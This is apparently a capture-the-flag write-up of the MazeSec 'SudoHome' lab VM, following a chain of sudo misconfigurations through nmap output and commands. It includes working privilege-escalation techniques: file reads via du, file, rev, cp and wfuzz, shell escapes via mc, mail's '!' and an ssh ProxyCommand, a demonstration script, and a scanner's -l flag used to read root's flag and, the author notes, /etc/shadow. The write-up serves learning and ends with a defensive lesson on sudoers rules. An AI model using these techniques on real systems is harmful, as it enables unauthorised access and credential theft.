
MazeSec vulnerable VM collection

SudoHome

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
WARNING: Could not obtain IP address for interface eth0. Using 0.0.0.0 for
the source address, which may not be what you want.
Either configure eth0 with an IP address, or manually specify the address
with the --arpspa option.
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: (none)
ERROR: Could not obtain interface IP address and netmask
ERROR: pcap_lookupnet: eth0: no IPv4 address assigned

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:66:2a:e1, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:d9:9b:56 (Unknown)
192.168.56.120 08:00:27:ab:f8:5f (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.876 seconds (136.46 hosts/sec). 3 responded

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -p- 192.168.56.120
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-05 11:48 +08
Nmap scan report for 192.168.56.120
Host is up (0.00037s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=PyCrt.PyCrt
| Subject Alternative Name: DNS:PyCrt.PyCrt
| Not valid before: 2025-04-01T14:05:29
|_Not valid after: 2035-03-30T14:05:29
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: moban, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:AB:F8:5F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: moban; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.38 seconds

┌──(root㉿kali)-[/home/kali]
└─# ssh user1@192.168.56.120
user1:0woA8Sr7I83R0ZwmnTcH
user1@192.168.56.120's password:
Linux SudoHome 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Nov 22 21:29:24 2025 from 192.168.56.102
user1@SudoHome:~$ sudo -l
Matching Defaults entries for user1 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user1 may run the following commands on SudoHome:
(user2) NOPASSWD: /usr/bin/du
user1@SudoHome:~$ sudo -u user2 /usr/bin/du --files0-from=/home/user2/password.txt
/usr/bin/du: cannot access 'tLPi3BLMG2zmwvZ5z9rh'$'\n': No such file or directory
user1@SudoHome:~$ su user2
Password:
user2@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user2 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user2 may run the following commands on SudoHome:
(user3) NOPASSWD: /usr/bin/file
user2@SudoHome:/home/user1$ sudo -u user3 /usr/bin/file -f /home/user3/password.txt
TFqxDyfGO69DP1lyjt0f: cannot open `TFqxDyfGO69DP1lyjt0f' (No such file or directory)
user2@SudoHome:/home/user1$ su user3
Password:
user3@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user3 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user3 may run the following commands on SudoHome:
(user4) NOPASSWD: /usr/bin/mc
user3@SudoHome:/home/user1$ sudo -u user4 /usr/bin/mc

user4@SudoHome:/home/user1$ 3
bash: 3: command not found

user3@SudoHome:/home/user1$ su user4
Password:
user4@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user4 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user4 may run the following commands on SudoHome:
(user5) NOPASSWD: /usr/bin/ssh
user4@SudoHome:/home/user1$ sudo -u user5 /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
$ whoami
user5
$ cat /home/user5/password.txt
GZ5KErjFycaYHZGj7GcI
$ exit
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
user4@SudoHome:/home/user1$ su user5
Password:
user5@SudoHome:/home/user1$ ls
password.txt
user5@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user5 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user5 may run the following commands on SudoHome:
(user6) NOPASSWD: /usr/bin/rev
user5@SudoHome:/home/user1$ touch /tmp/password.txt
user5@SudoHome:/home/user1$ chmod 777 /tmp/password.txt
user5@SudoHome:/home/user1$ sudo -u user7 /usr/bin/cp /home/user7/password.txt /tmp/password.txt

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for user5:

exitSorry, try again.
[sudo] password for user5:




Sorry, try again.
[sudo] password for user5:


sudo: 3 incorrect password attempts
user5@SudoHome:/home/user1$
user5@SudoHome:/home/user1$
user5@SudoHome:/home/user1$ sudo -u user6 /usr/bin/rev /home/user6/password.txt | rev
Z5cWU36wQhxAVGJbGwoL
user5@SudoHome:/home/user1$ su user6
Password:
user6@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user6 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user6 may run the following commands on SudoHome:
(user7) NOPASSWD: /usr/bin/cp
user6@SudoHome:/home/user1$ sudo -u user7 /usr/bin/cp /home/user7/password.txt /tmp/password.txt
user6@SudoHome:/home/user1$ cat /tmp/password.txt
HLoKAOu86miWIYKdyVx3
user6@SudoHome:/home/user1$ su user7
Password:
user7@SudoHome:/home/user1$ sudo -l
Matching Defaults entries for user7 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user7 may run the following commands on SudoHome:
(user8) NOPASSWD: /usr/bin/mail
user7@SudoHome:~$ sudo -l
Matching Defaults entries for user7 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user7 may run the following commands on SudoHome:
(user8) NOPASSWD: /usr/bin/mail
user7@SudoHome:~$ sudo -u user8 mail -f password.txt
mail: password.txt: Permission denied
user7@SudoHome:~$ ls
password.txt
user7@SudoHome:~$ pwd
/home/user7
user7@SudoHome:~$ cd ..
user7@SudoHome:/home$ cd user8
user7@SudoHome:/home/user8$ ls
password.txt
user7@SudoHome:/home/user8$ sudo -u user8 mail -f password.txt
Mail version 8.1.2 01/15/2001. Type ? for help.
"password.txt": 0 messages
& ?
& !cat password.txt
UxeGoUq8xqBRxyWVQPYK
!
& ^CInterrupt
&
At EOF
& exit
user7@SudoHome:/home/user8$ su user8
Password:
user8@SudoHome:~$ ls
password.txt
user8@SudoHome:~$ sudo -l
Matching Defaults entries for user8 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user8 may run the following commands on SudoHome:
(user9) NOPASSWD: /usr/bin/wfuzz
user8@SudoHome:~$ sudo -u user9 wfuzz -z file,/home/user9/password.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Bad usage: You must specify an URL.
user8@SudoHome:~$ sudo -u user9 wfuzz -z file,/home/user9/password.txt http://192.168.2.60:81/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.2.60:81/FUZZ
Total requests: 1

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================


Total time: 0
Processed Requests: 0
Filtered Requests: 0
Requests/sec.: 0

/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 7:
user8@SudoHome:~$ sudo -u user9 wfuzz -z file,/home/user9/password.txt http://192.168.56.120:81/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.56.120:81/FUZZ
Total requests: 1

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================


Total time: 0
Processed Requests: 0
Filtered Requests: 0
Requests/sec.: 0

/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 7: Failed to connect to 192.168.56.120 port 81: Connection refused
user8@SudoHome:~$ sudo -u user9 wfuzz -z file,/home/user9/password.txt http://192.168.56.120:80/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.56.120:80/FUZZ
Total requests: 1

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 404 9 L 31 W 276 Ch "peqkSBCDKvVxxNwcq1j4"

Total time: 0
Processed Requests: 1
Filtered Requests: 0
Requests/sec.: 0


From user1 all the way to reading root's flag, this box took nine sudo privilege-escalation techniques plus one file read that abused directory permissions and a symlink.

This could serve as teaching material for a "sudo storm"; call it a mini sudo storm.
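Every hop in the chain above rests on one primitive: a harmless-looking tool is allowed via sudo as the next user, it is pointed at that user's password.txt, and it echoes the contents back. du and file do it in their error messages, rev as normal output, wfuzz in the payload column, and the React2Shell scanner's -l host list on the next box does exactly the same. The script below is an added example, not code from the writeup or from MazeSec: it reproduces the three variants that only need GNU coreutils, util-linux and file, against a constructed secret file instead of a real /home/userN/password.txt and without sudo, so the mechanism can be checked on any Linux host. The leak_via_* function names and the temporary file are my own.

```sh
#!/bin/sh
# Added example (not from the writeup): "information leak through a read-only
# tool's own output", the primitive behind the du / file / rev steps on SudoHome.
# Locally the tools run as the current user; on the box each one was prefixed
# with "sudo -u <next user>" so it could open the next user's file.
set -u

WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
SECRET_FILE="$WORKDIR/password.txt"
# Constructed sample standing in for /home/user2/password.txt (same shape as on the box).
printf 'tLPi3BLMG2zmwvZ5z9rh\n' > "$SECRET_FILE"

# du --files0-from=FILE treats FILE as a NUL-separated list of paths. A plain
# one-line file is therefore a single bogus path, which GNU du reports on stderr:
#   du: cannot access 'tLPi3BLMG2zmwvZ5z9rh'$'\n': No such file or directory
# Only stderr is kept, and the quoted "path" is the secret.
leak_via_du() {
    du --files0-from="$1" 2>&1 >/dev/null \
      | sed -n "s/.*cannot access '\([^']*\)'.*/\1/p"
}

# file -f FILE reads filenames one per line and echoes each unreadable one
# back as "NAME: cannot open `NAME' (No such file or directory)" (older builds
# insert "ERROR:"; the pattern tolerates both). Assumes the secret has no ':'.
leak_via_file() {
    file -f "$1" 2>&1 | sed -n 's/^\([^:]*\): .*cannot open.*/\1/p'
}

# rev prints the file reversed; a second rev, run as yourself, restores it.
leak_via_rev() {
    rev "$1" | rev
}

# Demonstration when run directly.
for variant in du rev file; do
    if command -v "$variant" >/dev/null 2>&1; then
        printf '%-4s -> %s\n' "$variant" "$(leak_via_"$variant" "$SECRET_FILE")"
    else
        printf '%-4s -> (not installed here)\n' "$variant"
    fi
done
```

The defensive reading is the same for all of them: a sudoers rule is only as tight as the least interesting thing the binary can do with a filename, and tools that read, list or echo arbitrary paths (and any that spawn a shell, like mc, ssh's ProxyCommand or mail's `!`) should not be granted to another account without an argument restriction.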

Creds

React

This is the box for that recently very fashionable "nuke-level" CVE. Unfortunately I'm not yet fluent in this area and can't audit the code to analyse the root cause, so I can only play script kiddie against this machine.

(Damn, I didn't expect CISCN to test this as well; that made my day.)

Exploit it directly with the ready-made script.

Once inside, check sudo rights: there is an exploitable script, and its -l parameter (the host-list file) can be used to read a file.

bot@React:~$ sudo /opt/react2shell/scanner.py -l /root/root.txt -o /tmp/test/root.txt --all-result

brought to you by assetnote

[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled

[ERROR] flag{root-bc29a7159b63b18dc294002be32e1c22} - Connection Error: HTTPSConnectionPool(host='flag%7broot-bc29a7159b63b18dc294002be32e1c22%7d', port=443): Max retries exceeded with url: / (Caused by NameResolutionError("HTTPSConnection(host='flag%7broot-bc29a7159b63b18dc294002be32e1c22%7d', port=443): Failed to resolve 'flag%7broot-bc29a7159b63b18dc294002be32e1c22%7d' ([Errno -2] Name or service not known)"))

============================================================
SCAN SUMMARY
============================================================
Total hosts scanned: 1
Vulnerable: 0
Not vulnerable: 1
Errors: 0
============================================================

[ERROR] Failed to save results: [Errno 2] No such file or directory: '/tmp/test/root.txt'

That reads the flag: the scanner treats every line of the -l file as a hostname and prints it back in the connection error. The same primitive would also read /etc/shadow, whose root hash could then be cracked offline to recover root's password.

babyAD

The episode where I love AD the most, hahaha.

Hellman

This one was really something: I spent about six hours on it before finally getting through (even though the author rates it easy).

The entry point is easy: it's a Hellman cryptography challenge, and having an AI write an interactive script solves it.